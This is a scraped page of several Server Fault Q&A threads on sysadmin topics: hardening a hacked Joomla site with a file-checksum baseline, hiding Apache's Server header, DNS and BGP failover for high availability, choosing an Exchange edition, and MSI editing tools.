    13) isolate Internet-facing systems from your internal development, backup, etc. systems. Backups are no good if your internal systems are monitored by loggers and sniffers.

    14) keep researching server security with books and articles online, since this site cannot possibly cover everything you should know if you want to protect your business (and your customers) on a topic like that.
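
    For item 2, a minimal checksum baseline can be as simple as this (docroot and output paths are placeholders; keep the list somewhere the web server cannot write):

    find /var/www -type f -print0 | xargs -0 sha1sum > /root/site.sha1   # take the baseline
    sha1sum -c --quiet /root/site.sha1                                   # later: report anything that changed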

    Chris S : +1 "7) **backup backup backup"**
    Bart Silverstrim : i should have said that the backup should be more than a basic file backup but rather able to re-install from bare metal, and goes far enough back that you can reinstall pre-compromise.
  • That exploit typically takes place through a leaked ftp username/password

    From karmawhore
  • This is a common attack using stolen FTP credentials. So even if your Joomla install is secure, you need to use good passwords.

    First thing to do now is change your passwords asap.

    Details of this malware:

    http://blog.sucuri.net/2010/06/web-sites-hacked-with-malware-from-iopap-upperdarby26-com.html

    http://sucuri.net/malware/entry/MW:IOPAP:1

    Ivan Slaughter : Thanks sucuri, really helps my site survive.
    From sucuri

How do I remove the ServerSignature added by mod_fcgid?

I'm running Mod_Security and I'm using the SecServerSignature to customize the Server header that Apache returns. This part works fine, however I'm also running mod_fcgid which appends "mod_fcgid/2.3.5" to the header.

Is there any way I can turn this off? Setting ServerSignature off doesn't do anything. I was able to get it to go away by changing the ServerTokens but that removed the customization I had added.

  • ServerTokens is what manipulates the Server response header. (ServerSignature is used for server generated documents.)

    However, if you want to completely control the Server header I would suggest using the Header directive (from mod_headers):

    Header set Server "Apache/2 my_customizations"
    

    as an example.

    From rjk
  • php.ini:

    expose_php = Off
    
    From karmawhore

Global high availability setup question

I own and operate visualwebsiteoptimizer.com/. The app provides a code snippet which my customers insert in their websites to track certain metrics. Since the code snippet is external JavaScript (at the top of site code), before showing a customer website, a visitor's browser contacts our app server. In case our app server goes down, the browser will keep trying to establish the connection before it times out (typically 60 seconds). As you can imagine, we cannot afford to have our app server down in any scenario because it will negatively affect experience of not just our website visitors but our customers' website visitors too!

We are currently using DNS failover mechanism with one backup server located in a different data center (actually different continent). That is, we monitor our app server from 3 separate locations and as soon as it is detected to be down, we change A record to point to the back up server IP. This works fine for most browsers (as our TTL is 2 minutes) but IE caches the DNS for 30 minutes which might be a deal killer. See this recent post of ours visualwebsiteoptimizer.com/split-testing-blog/maximum-theoretical-downtime-for-a-website-30-minutes/

So, what kind of setup can we use to ensure an almost instant failover in case the app data center suffers a major outage? I read here www.tenereillo.com/GSLBPageOfShame.htm that having multiple A records is a solution, but we can't afford session synchronization (yet). Another strategy we are exploring is having two A records, one pointing to the app server and a second to a reverse proxy (located in a different data center) which forwards to the main app server if it is up and to the backup server otherwise. Do you think this strategy is reasonable?

Just to be clear about our priorities: we can afford to keep our own website or app down, but we can't let customers' websites slow down because of our downtime. So, in case our app servers are down, we don't need to respond with the default application response. Even a blank response will suffice; we just need the browser to complete that HTTP connection (and nothing else).

Reference: I read this thread which was useful serverfault.com/questions/69870/multiple-data-centers-and-http-traffic-dns-round-robin-is-the-only-way-to-assure

  • Your situation is fairly similar to ours. We want split datacentres, and network-layer type failover.

    If you've got the budget to do it, then what you want, is two datacentres, multiple IP transits to each, a pair of edge routers doing BGP sessions to your transit providers, advertising your IP addresses to the global internet.

    This is the only way to do true failover. When the routers notice that the route to your servers is no longer valid (which you can detect in a number of ways), they stop advertising that route, and traffic goes to the other site.

    The problem is, that for a pair of edge routers, you're looking at a fairly high cost initially to get this set up.
    Then you need to set up the networking behind all this, and you might want to consider some kind of Layer2 connectivity between your sites as a point-to-point link so that you'd have the ability to route traffic incoming to one datacentre, directly to the other in the event of partial failure of your primary site.

    http://serverfault.com/questions/110622/bgp-multihomed-multi-location-best-practice and http://serverfault.com/questions/86736/best-way-to-improve-resilience are questions that I asked about similar issues.

    The GSLB page of shame does raise some important points, which is why, personally I'd never willingly choose a GSLB to do the job of BGP routing.

    You should also look at the other points of failure in your network. Make sure all servers have 2 NICs (connected to 2 separate switches), 2 PSUs, and that your service is comprised of multiple backend servers, as redundant pairs, or load-balanced clusters.

    Basically, DNS "load balancing" via multiple A records is just "load-sharing" as the DNS server has no concept of how much load is on each server. This is cheap (free).

    A GSLB service has some concept of how loaded the servers are, and their availability, and provides some greater resistance to failure, but is still plagued by the problems related to dns caching, and pegging. This is less cheap, but slightly better.

    A BGP-routed network, backed by a solid infrastructure, is, IMHO, the only way to truly guarantee good uptime. You could save some money by using servers running routing software instead of Cisco/Juniper/etc routers, but at the end of the day you need to manage those servers very carefully indeed. This is by no means a cheap option, or something to be undertaken lightly, but it is a very rewarding solution, and it brings you into the internet as a provider rather than just a consumer.

    Paras Chopra : Thanks, I wanted to upvote your answer but couldn't because I am new. Well, yes BGP routed network seems to be the way to go but it can be fairly hard to setup and manage for a startup (both cost and man-power resources wise). I wish there were a cheaper solution for this but probably there isn't.
    Tom O'Connor : I'm going to write this up as an essay on my blog tonight, I think. The cheapest solution for the edge routers for you, would be a pair of Dell R200s each with a couple extra NICs, and a stack of RAM (4-6GB should be sufficient), then run something like FreeBSD and Quagga, or BIRD.
    Paras Chopra : Fantastic! I will be sure to check it up. Please update this thread with the link so that I don't miss it out.
    voretaq7 : +1 on the El-Cheapo router solution - We're actually running FreeBSD routers at my company with great results. If you want something a bit more commercial (but still way cheaper than comparable Cisco gear) Juniper Networks gear (www.juniper.net) might also be a good choice.
  • Actually, what you want could also be extended to help your split testing activities if you combine GeoDNS and DNS failover.

    Sending group A to IP 1 and group B to IP 2, even if they were on the same server, would let you separate your testing groups. Group A and group B are from different geographical regions. To be fair, the next day/week/month you flip the groups to make sure that you allow for geographic differences, just to be rigorous in your methodology.

    The geodns/failover dns service at http://edgedirector.com can do this

    Disclosure: I am associated with the above link; I stumbled in here researching an article on applying stupid DNS tricks to split testing.

    From spenser

Need to implement Exchange server

I need to implement Microsoft Exchange Server 2010 in my office for 20 email accounts.

Which version should I prefer?

Exchange Server 2010 Standard Edition or Exchange Server 2010 Enterprise Edition?

Thanks

ORCA MSI Editing

Morning all,

I am trying to edit an MSI package using ORCA. It is quite a good tool, but does anyone know of any other good MSI editing tools?

Cheers

  • ORCA is "offical" but quite lacking in features. We use a collection of tools for our packaging needs. Some of these tool go far beyond just editing an MSI.

    1. Super ORCA
    2. WiX
    3. Advanced Installer
    4. Universal Extractor
    Cyper : Brilliant, thanks for that. Will give these tools a try.
    From jscott